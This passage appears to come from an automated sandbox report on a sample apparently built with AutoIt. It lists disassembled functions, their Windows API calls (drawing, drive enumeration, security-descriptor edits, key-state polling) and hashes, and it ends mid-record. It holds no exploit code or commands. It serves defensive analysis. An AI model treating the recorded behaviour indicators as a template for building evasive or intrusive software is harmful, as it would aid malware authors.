                                                                      • API String ID:
                                                                      • Opcode ID: 71d49e5dbb8cfdc69cbfb605a3bd305e83ec46a7f2068afee7876c08285190a7
                                                                      • Instruction ID: ed17a798c2b28bd2ad0fe451bb5d38b4203a230da30ebc1aacbe9d3a061424c1
                                                                      • Opcode Fuzzy Hash: 71d49e5dbb8cfdc69cbfb605a3bd305e83ec46a7f2068afee7876c08285190a7
                                                                      • Instruction Fuzzy Hash: 8E02C6B0E00219EFDB14DF55D881AAEBBB1FF44304F108569E8169B291EB31EE21DB95
                                                                      Function 00C59EEE Relevance: .3, Instructions: 294COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22edf8e84cf75026e75dee9201259378458b12dc2cdf4cbf294dd66f67ba0741
                                                                      • Instruction ID: ad125024d3cfb9dde10cb0c5a086dd1fdf59f8eec2aff12f10e2998b83ae33b7
                                                                      • Opcode Fuzzy Hash: 22edf8e84cf75026e75dee9201259378458b12dc2cdf4cbf294dd66f67ba0741
                                                                      • Instruction Fuzzy Hash: 66B1E120D2AF814DD3239639D83133AB65CAFBB6D5F95D71BFC2674D62EB2286834140
                                                                      Function 00C47A4A Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03301619bf102c4c31924df29fa0706d223576eb907da8fb87dd865a831e32c8
                                                                      • Instruction ID: 8eecf0d18269045bfdc80102f2619767fed662bb5b4729de1dc25fbc3dbe7458
                                                                      • Opcode Fuzzy Hash: 03301619bf102c4c31924df29fa0706d223576eb907da8fb87dd865a831e32c8
                                                                      • Instruction Fuzzy Hash: 9061787160874997EE349A288D95BBE2398FF41700F201B1EFDA3DB281DB119F46E356
                                                                      Function 00C47CA7 Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebc6e359fac7bd68019a1189440f013adbfeaa65ac0abcce308b523f081befc
                                                                      • Instruction ID: 4f4c5225925e5167411102475d76c8c4a3908fbe518ccd74249a75ccf051b3d5
                                                                      • Opcode Fuzzy Hash: 2ebc6e359fac7bd68019a1189440f013adbfeaa65ac0abcce308b523f081befc
                                                                      • Instruction Fuzzy Hash: 3961CD31E2C7496BDE389A284D95BBF2398FF42704F100B59E953DB281DB12EF429355
                                                                      Function 0314D1C0 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: 66ccf442dadadab89011d4811e061708bb67a13c0fa4f0d3c7426561630c73e2
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 6C41A171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                      Function 00C92046 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41f9c06b2eaf597d5e1dff16273f6ddcad019c6b2fa2be0825164468f6364f34
                                                                      • Instruction ID: d5db6a420af4e0c4c8aff40f692e7c443d20d291a4807759e68605b031481d1a
                                                                      • Opcode Fuzzy Hash: 41f9c06b2eaf597d5e1dff16273f6ddcad019c6b2fa2be0825164468f6364f34
                                                                      • Instruction Fuzzy Hash: B221B7326206158BDB28CF79C82377E73E5A754320F25862EE4A7C37D1DE35A904CB80
                                                                      Function 0314D0B0 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: b4c00e7ead70f2a4230156728c042565577b8f7799d6c174f4556e6795d59860
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: F7018078A05209EFCB44DF98D5909AEF7B5FB4C310B2085D9D819A7705D730AE42DB80
                                                                      Function 0314D050 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: cc3fef96b466f304c755adcb1b250e160b6af21506541521c6fea9486b8a4152
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: D9019278A01209EFCB48DF98D5909AEF7F5FB48310F2085D9D819AB305D731AE42DB80
                                                                      Function 0314BA20 Relevance: .0, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      Function 00CB70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CB712F
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CB7160
                                                                      • GetSysColor.USER32(0000000F), ref: 00CB716C
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00CB7186
                                                                      • SelectObject.GDI32(?,?), ref: 00CB7195
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CB71C0
                                                                      • GetSysColor.USER32(00000010), ref: 00CB71C8
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00CB71CF
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00CB71DE
                                                                      • DeleteObject.GDI32(00000000), ref: 00CB71E5
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00CB7230
                                                                      • FillRect.USER32(?,?,?), ref: 00CB7262
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB7284
                                                                        • Part of subcall function 00CB73E8: GetSysColor.USER32(00000012), ref: 00CB7421
                                                                        • Part of subcall function 00CB73E8: SetTextColor.GDI32(?,?), ref: 00CB7425
                                                                        • Part of subcall function 00CB73E8: GetSysColorBrush.USER32(0000000F), ref: 00CB743B
                                                                        • Part of subcall function 00CB73E8: GetSysColor.USER32(0000000F), ref: 00CB7446
                                                                        • Part of subcall function 00CB73E8: GetSysColor.USER32(00000011), ref: 00CB7463
                                                                        • Part of subcall function 00CB73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CB7471
                                                                        • Part of subcall function 00CB73E8: SelectObject.GDI32(?,00000000), ref: 00CB7482
                                                                        • Part of subcall function 00CB73E8: SetBkColor.GDI32(?,00000000), ref: 00CB748B
                                                                        • Part of subcall function 00CB73E8: SelectObject.GDI32(?,?), ref: 00CB7498
                                                                        • Part of subcall function 00CB73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00CB74B7
                                                                        • Part of subcall function 00CB73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CB74CE
                                                                        • Part of subcall function 00CB73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00CB74DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: 738ec446cad1faddcd52c1419ba5ab530128018f3274d182d8bc53af154f521f
                                                                      • Instruction ID: 6763ea0928cade1d4b35e73fbc1f2f8eee5abc912f45319c4163a050e82cbac4
                                                                      • Opcode Fuzzy Hash: 738ec446cad1faddcd52c1419ba5ab530128018f3274d182d8bc53af154f521f
                                                                      • Instruction Fuzzy Hash: 50A16272008301EFD7119F64DC88B9F7BA9FB89321F100B19F9A2A61E1D775E944DB62
                                                                      Function 00C38D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00C38E14
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C76AC5
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C76AFE
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C76F43
                                                                        • Part of subcall function 00C38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C38BE8,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C38FC5
                                                                      • SendMessageW.USER32(?,00001053), ref: 00C76F7F
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C76F96
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C76FAC
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C76FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: 867e201817f4a852ab1dc0d27c05360b67177d2885f2c7b502ac153e9a9d5f92
                                                                      • Instruction ID: 07d4e03ee13605e330eba78d62ce2efbef1f9f3ae27dd12be3afaf78d2301f2b
                                                                      • Opcode Fuzzy Hash: 867e201817f4a852ab1dc0d27c05360b67177d2885f2c7b502ac153e9a9d5f92
                                                                      • Instruction Fuzzy Hash: 6F12BB34200A01DFDB25CF24C884BBABBA5FB45300F188569F4A9CB261CB71EE56DF91
                                                                      Function 00C94ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C94AED
                                                                      • GetDriveTypeW.KERNEL32(?,00CBCB68,?,\\.\,00CBCC08), ref: 00C94BCA
                                                                      • SetErrorMode.KERNEL32(00000000,00CBCB68,?,\\.\,00CBCC08), ref: 00C94D36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 79836d11964b6b08f033614162e2b7c484cd8e93801a2388472ef121f4b56958
                                                                      • Instruction ID: 0f70e9dbe8b57f45167982328543ebe32d2a04f26e3f4e21c499ace9497b06cd
                                                                      • Opcode Fuzzy Hash: 79836d11964b6b08f033614162e2b7c484cd8e93801a2388472ef121f4b56958
                                                                      • Instruction Fuzzy Hash: 0361D330705246DFCF0CDF26CA8AD6CB7A1EB18384B244465F806AB691DB35EF52EB41
                                                                      Function 00CB73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00CB7421
                                                                      • SetTextColor.GDI32(?,?), ref: 00CB7425
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CB743B
                                                                      • GetSysColor.USER32(0000000F), ref: 00CB7446
                                                                      • CreateSolidBrush.GDI32(?), ref: 00CB744B
                                                                      • GetSysColor.USER32(00000011), ref: 00CB7463
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CB7471
                                                                      • SelectObject.GDI32(?,00000000), ref: 00CB7482
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00CB748B
                                                                      • SelectObject.GDI32(?,?), ref: 00CB7498
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CB74B7
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CB74CE
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB74DB
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CB752A
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CB7554
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00CB7572
                                                                      • DrawFocusRect.USER32(?,?), ref: 00CB757D
                                                                      • GetSysColor.USER32(00000011), ref: 00CB758E
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CB7596
                                                                      • DrawTextW.USER32(?,00CB70F5,000000FF,?,00000000), ref: 00CB75A8
                                                                      • SelectObject.GDI32(?,?), ref: 00CB75BF
                                                                      • DeleteObject.GDI32(?), ref: 00CB75CA
                                                                      • SelectObject.GDI32(?,?), ref: 00CB75D0
                                                                      • DeleteObject.GDI32(?), ref: 00CB75D5
                                                                      • SetTextColor.GDI32(?,?), ref: 00CB75DB
                                                                      • SetBkColor.GDI32(?,?), ref: 00CB75E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 0078570746cbe37773d0d7f127148b6733761bece5f7f52cdb8f2a953627f28c
                                                                      • Instruction ID: 20cf75c44a81bc563354d02f77af8cf44a48bf81b3cf44fd010bafcb6d0a614f
                                                                      • Opcode Fuzzy Hash: 0078570746cbe37773d0d7f127148b6733761bece5f7f52cdb8f2a953627f28c
                                                                      • Instruction Fuzzy Hash: 55615D72904218AFDB119FA8DC89FEE7FB9EB48320F114215F915BB2A1D7709940DFA0
                                                                      Function 00C38891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C38968
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00C38970
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C3899B
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00C389A3
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00C389C8
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C389E5
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C389F5
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C38A28
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C38A3C
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00C38A5A
                                                                      • GetStockObject.GDI32(00000011), ref: 00C38A76
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C38A81
                                                                        • Part of subcall function 00C3912D: GetCursorPos.USER32(?), ref: 00C39141
                                                                        • Part of subcall function 00C3912D: ScreenToClient.USER32(00000000,?), ref: 00C3915E
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000001), ref: 00C39183
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000002), ref: 00C3919D
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00C390FC), ref: 00C38AA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 10841a65f2226ee4cc18f32b2bfea308ba97df6006a76398e7bf5118905687f4
                                                                      • Instruction ID: 96c890380553018ba293ea5b77a02b66985bd857c9401373b97ded5ecea6d791
                                                                      • Opcode Fuzzy Hash: 10841a65f2226ee4cc18f32b2bfea308ba97df6006a76398e7bf5118905687f4
                                                                      • Instruction Fuzzy Hash: 7FB18971A00209EFDF14DFA8CC85BAE3BB5FB48314F158229FA15AB2D0DB74A944CB51
                                                                      Function 00C80D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C81114
                                                                        • Part of subcall function 00C810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81120
                                                                        • Part of subcall function 00C810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C8112F
                                                                        • Part of subcall function 00C810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81136
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C8114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C80DF5
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C80E29
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80E40
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C80E7A
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C80E96
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80EAD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C80EB5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C80EBC
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C80EDD
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C80EE4
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C80F13
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C80F35
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C80F47
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80F6E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80F75
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80F7E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80F85
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80F8E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80F95
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C80FA1
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80FA8
                                                                        • Part of subcall function 00C81193: GetProcessHeap.KERNEL32(00000008,00C80BB1,?,00000000,?,00C80BB1,?), ref: 00C811A1
                                                                        • Part of subcall function 00C81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C80BB1,?), ref: 00C811A8
                                                                        • Part of subcall function 00C81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C80BB1,?), ref: 00C811B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 33729d71279b9992f7cdb0b25b11b038ec60a5e90c2c01c744ee3cf2706b237d
                                                                      • Instruction ID: 30b0b40e70ebefb2fc2b3cde3b141167f637d71775c2f4fe55a144157145661c
                                                                      • Opcode Fuzzy Hash: 33729d71279b9992f7cdb0b25b11b038ec60a5e90c2c01c744ee3cf2706b237d
